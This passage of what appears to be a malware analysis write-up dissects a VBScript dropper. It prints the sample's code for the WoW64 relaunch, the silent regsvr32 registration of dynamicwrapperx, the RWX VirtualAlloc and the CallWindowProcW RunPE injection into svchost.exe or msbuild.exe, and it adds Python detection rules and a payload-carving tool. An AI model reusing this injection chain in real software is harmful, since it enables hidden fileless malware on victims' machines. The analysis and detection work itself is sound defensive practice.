set objwmiservice = getobject ("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery ("select * from win32_computersystem")
for each objitem in colitems
    systemtype = objitem.systemtype
next
if (ucase(systemtype) = "x64-based pc") and (instr (ucase(wscript.path),"syswow64") = 0) then
shellobj.run shellobj.expandenvironmentstrings("%windir%")&"\syswow64\wscript.exe //b //e:vbscript "&chr(34)&wscript.scriptfullname&chr(34)
wscript.quit
end if
end sub
It forces the use of syswow64\wscript.exe (the 32-bit script host) if the script was started on a 64-bit OS by the 64-bit wscript.exe : if needed, it runs another instance of the current script with the targeted wscript.exe, then wscript.quit.
This is needed because the dropped DLL is a 32-bit PE (its header, decoded from the first lines of dcom_data, has Machine = 0x14C, i386) and the loader is 32-bit code : a 64-bit wscript.exe could not load them.
=> syswow64 :
"32-bit applications that include only 32-bit kernel-mode device drivers, or that plug into the process space of components that are implemented purely as 64-bit processes (e.g. Windows Explorer) cannot be executed on a 64-bit platform. 32-bit service applications are supported. The SysWOW64 folder located in the Windows folder on the OS drive contains several applications to support 32-bit applications"
=> file_name = "injector.vbs"
=> install_dir = "%temp%"
=> dcom_name : %temp%\injector.vbs.bin
if not is_dotnet then
host_file = shellobj.expandenvironmentstrings ("%windir%" & "\" & host_file)
else
host_file = shellobj.expandenvironmentstrings ("%windir%")&"\microsoft.net\framework\v2.0.50727\msbuild.exe"
end if
Here, the host_file :
"%windir%\system32\svchost.exe" if the .NET Framework is NOT installed
else : "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"
=> both hosts are legitimate Microsoft binaries : once injected, the malware runs under a process name that looks normal
write_file dcom_name,texttobinary(dcom_data, "bin.base64")
=> it creates injector.vbs.bin (after base64 decoding) with the functions we have seen in part 3-3), from the hard-coded data of the obfuscated dcom_data string
What is this file ? A dll file, in reality
What is this dll for ?
Hahaha, see below
do
shellobj.run "regsvr32.exe /i /s "& chr(34)&dcom_name& chr(34),0,true
set dcom = createobject("dynamicwrapperx")
wscript.sleep 1000
loop until isobject(dcom)
=> a loop that registers injector.vbs.bin with regsvr32 (/s : silent, /i : also call DllInstall) and retries every second until the "dynamicwrapperx" object can be created
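Everything seen so far leaves a trail a SOC can look for : a Run value and a Startup copy launching wscript.exe //b on a script in %temp%, wscript.exe relaunching itself under syswow64, regsvr32 /i /s on a .bin from %temp%, and msbuild.exe or svchost.exe started by a script host. The following is an added detection example written for this post ; it is not code from the post or from the sample. It scores constructed process-creation events laid out like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage) plus one constructed Run-key value : the event shapes, paths and rule names are assumptions made for the example.

```python
import re

# Constructed events in the shape of Sysmon Event ID 1 (process creation) fields.
# They are made up for this example, not logs captured from the sample.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'wscript.exe //b //e:vbscript "C:\Users\bob\AppData\Local\Temp\injector.vbs"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /i /s "C:\Users\bob\AppData\Local\Temp\injector.vbs.bin"',
     "ParentImage": r"C:\Windows\SysWOW64\wscript.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"',
     "ParentImage": r"C:\Windows\SysWOW64\wscript.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",          # benign control event
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
]

# A constructed HKCU\...\Run value, shaped like the one the script writes.
RUN_VALUE = r'wscript.exe //b //e:vbscript "C:\Users\bob\AppData\Local\Temp\injector.vbs"'

USER_WRITABLE = re.compile(r"\\(temp|tmp|appdata|start menu\\programs\\startup)\\", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
INJECTION_HOSTS = ("msbuild.exe", "svchost.exe")


def tokenize(cmdline):
    """Split a Windows command line on spaces, keeping quoted paths whole (quotes stripped)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def wscript_findings(args):
    """Rules for a wscript/cscript argument list (also reused for the Run-key value)."""
    hits = []
    switches = {a.lower() for a in args if a.startswith("//")}
    script = next((a for a in args if not a.startswith("//")), "")
    if "//b" in switches and USER_WRITABLE.search(script):
        hits.append("script host in batch mode (//b) running a script from a user-writable path")
    if "//e:vbscript" in switches and not script.lower().endswith(".vbs"):
        hits.append("//e:vbscript forces the VBScript engine on a non-.vbs file")
    return hits


def check_event(ev):
    """Return the rule names an event triggers (empty list = nothing suspicious)."""
    hits = []
    image, parent = ev["Image"].lower(), ev["ParentImage"].lower()
    exe, parent_exe = basename(image), basename(parent)
    args = tokenize(ev["CommandLine"])[1:]
    if exe in SCRIPT_HOSTS:
        hits += wscript_findings(args)
        # fix_wow64 behaviour : the 64-bit script host starts the SysWOW64 one
        if "\\syswow64\\" in image and parent_exe == exe and "\\system32\\" in parent:
            hits.append("script host relaunched itself under SysWOW64")
    elif exe == "regsvr32.exe":
        target = next((a for a in args if not a.startswith("/")), "")
        if target and not target.lower().endswith((".dll", ".ocx", ".ax")):
            hits.append("regsvr32 target has no DLL extension")
        if USER_WRITABLE.search(target):
            hits.append("regsvr32 registering a file from a user-writable path")
        if parent_exe in SCRIPT_HOSTS:
            hits.append("regsvr32 spawned by a script host")
    elif exe in INJECTION_HOSTS and parent_exe in SCRIPT_HOSTS:
        hits.append("%s spawned by a script host (candidate RunPE host)" % exe)
    return hits


def check_run_value(value):
    """Apply the script-host rules to a Run-key value such as the one the script writes."""
    args = tokenize(value)
    if not args or basename(args[0]) not in SCRIPT_HOSTS:
        return []
    return wscript_findings(args[1:])


def scan(events):
    """Map event index -> findings, for the events that triggered at least one rule."""
    out = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            out[i] = hits
    return out


if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(idx, EVENTS[idx]["CommandLine"])
        for h in hits:
            print("   -", h)
    print("Run value:", check_run_value(RUN_VALUE))
```

The benign control event (a vendor installer registering a .dll from Program Files) triggers nothing, the three events modelled on this sample each trigger at least one rule, and the Run value is caught by the same //b-plus-user-writable-path rule as the process event ; on real telemetry the paths in USER_WRITABLE and the list of injection hosts are the parts to tune.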
dcom.register "user32.dll", "callwindowprocw",lcase("i=phull"), lcase("r=u")
dcom.register "kernel32.dll", "virtualalloc",lcase("i=puuu"), lcase("r=p")
=> Now I can explain :
- a dll (injector.vbs.bin) is registered,
- an object "dynamicwrapperx" is created => dcom
- this object is used to register two functions of the Windows API ("i=" describes the input parameter types, p = pointer, h = handle, u = unsigned 32-bit integer, l = 32-bit integer ; "r=" the return type)
injector.vbs.bin is in fact dynamicwrapperx.dll :
"An ActiveX component (COM server) that allows to call functions exported by DLL libraries, in particular Windows API functions, from scripts in JScript and VBScript."
=> callwindowprocw and virtualalloc can now be called from the script.
loader_data = base64tohex (loader_data)
for i = 0 to ubound (file_data) -1 step 1
file_data(i) = base64tohex (file_data(i))
next
=> the loader_data and file_data strings are now deobfuscated (hex strings)
loader_ptr = dcom.virtualalloc (0,len(loader_data)/2,4096,64)
for i = 1 to len (loader_data) step 2
char = asc(chr("&h"&mid (loader_data,i,2)))
dcom.numput eval(char),loader_ptr,(i-1)/2
next
count = 0
=> uses virtualalloc to reserve memory in the virtual address space of the calling process (here : the 32-bit wscript.exe) ; the size is len(loader_data)/2 because two hex chars give one byte
=> loader_ptr is a pointer to this allocated memory
=> loader_data is put on the allocated memory after some modifications :
- a single For loop, because loader_data is one string
char = asc(chr("&h"&mid (loader_data,i,2)))
dcom.numput eval(char),loader_ptr,(i-1)/2
=> mid (loader_data,i,2) takes two chars at the current index i
=> "&h" is added at the beginning to tell the chr function that the string has to be read as a HEX number :
- example : "&h41" (HEX) will not give the same result as "41" (decimal)
=> chr("&h41") => 'A'
=> chr("41") => ')'
=> char = asc(chr(...)) gives the numeric code back (decimal) : 65 for "&h41"
=> dcom.numput writes that value at the loader_ptr address with the (i-1)/2 offset, so the bytes land one after the other
pe_ptr = dcom.virtualalloc (0,file_size+1,4096,64)
for i = 0 to ubound (file_data) -1 step 1
for x = 1 to len (file_data(i)) step 2
char = asc(chr("&h"&mid (file_data(i),x,2)))
dcom.numput eval(char),pe_ptr,count
count = count + 1
next
next
=> uses virtualalloc again, to reserve a second area in the memory of the process
=> pe_ptr is a pointer to this area
=> file_data is put on the allocated memory after the same modifications :
- nested For loops, because file_data is an array of strings :
=> each string is handled by index i and, for each one, index x walks the string two chars at a time :
=> HEX representation (two chars) to numeric code
=> writes the byte at the pe_ptr address with the count offset ; count grows by one per byte, so the pieces of the array are written contiguously
=> note : ubound(file_data) is the last index of the array, so "to ubound (file_data) -1" never processes the last element of file_data
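The two loops above (the loader one and this nested one) are a complete recipe for rebuilding, offline, exactly the bytes the script writes to loader_ptr and pe_ptr, which is how to carve the file-less payload out of the script without running it. The following is an added example in Python, not code from the post or from the sample : it re-implements the pipeline (base64tohex, then "&h" pairs to bytes at consecutive offsets, with the same ubound - 1 bound) and checks that the rebuilt buffer is a PE. base64tohex is defined in part 3-3) and not shown on this page, so its behaviour (plain base64 decode, then hex) is an assumption ; the input strings are constructed (a fake 80-byte PE header and a three-byte placeholder in place of the loader), not the sample's data.

```python
import base64
import binascii


def base64tohex(s):
    """Assumed behaviour of the script's base64tohex (part 3-3 is not on this page):
    plain base64 decode, then the hex string of the resulting bytes."""
    return binascii.hexlify(base64.b64decode(s)).decode()


def script_byte(pair):
    """asc(chr("&h" & pair)) : the "&h" prefix makes VBScript read the two chars as hex,
    so the round trip through chr/asc is just a hex-to-integer conversion."""
    return int(pair, 16)


def hex_to_bytes(hexstr):
    """for i = 1 to len(s) step 2 / char = asc(chr("&h" & mid(s, i, 2))) / numput char, ptr, (i-1)/2
    One byte per hex pair, written at consecutive offsets."""
    return bytes(script_byte(hexstr[i:i + 2]) for i in range(0, len(hexstr), 2))


def rebuild_loader(loader_b64):
    """What ends up at loader_ptr : a single string, a single loop."""
    return hex_to_bytes(base64tohex(loader_b64))


def rebuild_pe(file_data_b64):
    """What ends up at pe_ptr. Mirrors the nested loops, including the bound
    'for i = 0 to ubound(file_data) - 1' : ubound is the last valid index, so the
    last element of the array is never written (count just keeps growing across elements)."""
    parts = [base64tohex(s) for s in file_data_b64]
    buf = bytearray()
    for part in parts[:-1]:
        buf += hex_to_bytes(part)
    return bytes(buf)


def is_pe(buf):
    """Minimal sanity check on the carved buffer : MZ at offset 0 and the PE signature at e_lfanew."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(buf[0x3C:0x40], "little")
    return buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# --- constructed sample input (not the sample's real data) --------------------

def _fake_pe_header():
    """80 bytes that look like the start of a PE : DOS header, e_lfanew = 0x40,
    PE signature, Machine = 0x14c (i386), padding."""
    hdr = bytearray(b"MZ") + bytearray(0x3E)
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    hdr += b"PE\x00\x00" + (0x14C).to_bytes(2, "little") + bytes(10)
    return bytes(hdr)


FAKE_PE = _fake_pe_header()
# file_data as the script would hold it : base64 chunks, plus an empty trailing element
# (assumed here so that the ubound-1 bound loses nothing)
FILE_DATA = [base64.b64encode(FAKE_PE[i:i + 16]).decode() for i in range(0, len(FAKE_PE), 16)] + [""]
LOADER_B64 = base64.b64encode(b"\x90\x90\xc3").decode()   # placeholder bytes, not the RunPE loader


if __name__ == "__main__":
    pe = rebuild_pe(FILE_DATA)
    print("loader bytes :", rebuild_loader(LOADER_B64).hex())
    print("pe bytes     :", len(pe), "is_pe =", is_pe(pe))
    # dropping the empty trailer shows what the ubound-1 bound really costs
    print("without trailer : is_pe =", is_pe(rebuild_pe(FILE_DATA[:-1])))
```

On a real sample, replace FILE_DATA and LOADER_B64 with the strings taken from the deobfuscated script and write rebuild_pe(...) to a file for further analysis. If the last element of file_data carries real bytes, the ubound - 1 bound silently drops them and is_pe can fail on the carved buffer, which is the first thing to check when the result does not look like a PE.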
=> THE FILE-LESS MALWARE
C++ :
LPVOID WINAPI VirtualAlloc(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
Here, for both memory allocations : lpAddress = 0 (the system chooses the address), dwSize is the size to allocate, flAllocationType = 4096 = 0x1000 = MEM_COMMIT, flProtect = 64 = 0x40 = PAGE_EXECUTE_READWRITE
=> the memory is readable, writable and executable at once (RWX) : the loader and the PE need that to run from there, and it is also what a defender can look for (a script host allocating RWX memory)
=> the return value is the pointer to the beginning of the allocated memory
dcom.callwindowprocw loader_ptr, => the RunPE shellcode
pe_ptr, => a pointer to the malware (the PE written above)
dcom.strptr (host_file), => pointer to the host_file string
dcom.strptr (command_line), => pointer to the command_line (here : "")
0
=> callwindowprocw treats its first argument as a function pointer and calls it with the four other arguments : the loader shellcode runs, with pe_ptr, host_file and command_line as its parameters
=> the loader injects the malware PE into the targeted host_file and runs it (RunPE : the malware never exists as a file on disk, only the dll and the script do)
Remember, in this script the host_file is :
"%windir%\system32\svchost.exe" if the .NET Framework is NOT installed
else : "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"
C++ :
LRESULT WINAPI CallWindowProc(
_In_ WNDPROC lpPrevWndFunc,
_In_ HWND hWnd,
_In_ UINT Msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
);